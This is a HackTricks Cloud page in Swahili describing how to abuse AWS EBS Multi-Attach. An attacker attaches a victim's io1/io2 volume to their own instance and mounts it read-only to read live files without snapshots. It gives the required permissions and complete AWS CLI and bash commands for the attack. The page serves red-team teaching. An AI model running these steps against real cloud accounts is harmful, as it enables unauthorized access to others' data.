AWS - Uiba wa Data ya Moja kwa Moja kupitia EBS Multi-Attach

Reading time: 4 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Muhtasari

Kutumia vibaya EBS Multi-Attach kusoma kutoka kwenye volume ya data hai io1/io2 kwa kuambatisha volume ile ile kwenye instance inayodhibitiwa na mshambuliaji katika Availability Zone (AZ) ile ile. Mounting the shared volume read-only kunatoa ufikiaji wa mara moja kwa mafaili yanayotumika bila kuunda snapshots.

Mahitaji

Volume lengwa: io1 au io2 iliyoundwa na --multi-attach-enabled katika AZ ile ile kama instance ya mshambuliaji.
Ruhusa: ec2:AttachVolume, ec2:DescribeVolumes, ec2:DescribeInstances kwenye volume/instances lengwa.
Miundombinu: aina za instance za Nitro zinazounga mkono Multi-Attach (familia za C5/M5/R5, n.k.).

Vidokezo

Pakia (mount) kwa read-only na -o ro,noload ili kupunguza hatari ya uharibifu na kuepuka journal replays.
Kwenye instances za Nitro kifaa cha EBS NVMe kinaonyesha njia thabiti /dev/disk/by-id/nvme-Amazon_Elastic_Block_Store_vol... (msaada hapa chini).

Andaa volume ya Multi-Attach io2 na uiambatisha kwa mwenyeathirika

Mfano (tengeneza katika us-east-1a na uiambatisha kwa mwenyeathirika):

bash

AZ=us-east-1a
# Create io2 volume with Multi-Attach enabled
VOL_ID=$(aws ec2 create-volume \
--size 10 \
--volume-type io2 \
--iops 1000 \
--availability-zone $AZ \
--multi-attach-enabled \
--tag-specifications 'ResourceType=volume,Tags=[{Key=Name,Value=multi-shared}]' \
--query 'VolumeId' --output text)

# Attach to victim instance
aws ec2 attach-volume --volume-id $VOL_ID --instance-id $VICTIM_INSTANCE --device /dev/sdf

Kwenye mwathiriwa, format/mount the new volume na uandike data nyeti (kwa mfano):

bash

VOLNOHYP="vol${VOL_ID#vol-}"
DEV="/dev/disk/by-id/nvme-Amazon_Elastic_Block_Store_${VOLNOHYP}"
sudo mkfs.ext4 -F "$DEV"
sudo mkdir -p /mnt/shared
sudo mount "$DEV" /mnt/shared
echo 'secret-token-ABC123' | sudo tee /mnt/shared/secret.txt
sudo sync

Ambatisha volumu ile ile kwenye instance ya mshambuliaji

bash

aws ec2 attach-volume --volume-id $VOL_ID --instance-id $ATTACKER_INSTANCE --device /dev/sdf

Mount read-only kwenye mshambuliaji na soma data

bash

VOLNOHYP="vol${VOL_ID#vol-}"
DEV="/dev/disk/by-id/nvme-Amazon_Elastic_Block_Store_${VOLNOHYP}"
sudo mkdir -p /mnt/steal
sudo mount -o ro,noload "$DEV" /mnt/steal
sudo cat /mnt/steal/secret.txt

Matokeo yaliyotarajiwa: VOL_ID ile ile inaonyesha Attachments nyingi (victim na attacker) na attacker anaweza kusoma faili zilizoandikwa na victim bila kuunda snapshot yoyote.

bash

aws ec2 describe-volumes --volume-ids $VOL_ID \
--query 'Volumes[0].Attachments[*].{InstanceId:InstanceId,State:State,Device:Device}'

Msaidizi: pata njia ya kifaa cha NVMe kwa Volume ID

Katika instances za Nitro, tumia njia thabiti by-id inayojumuisha volume id (ondoa dash baada ya vol):

bash

VOLNOHYP="vol${VOL_ID#vol-}"
ls -l /dev/disk/by-id/ | grep "$VOLNOHYP"
# -> nvme-Amazon_Elastic_Block_Store_volXXXXXXXX...

Impact

Ufikiaji wa kusoma mara moja kwa data hai kwenye EBS volume ya lengo bila kuunda snapshots.
Ikiwa ime-mounted read-write, mshambuliaji anaweza kuingilia filesystem ya mwathiriwa (hatari ya uharibifu).

tip

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

HackTricks Cloud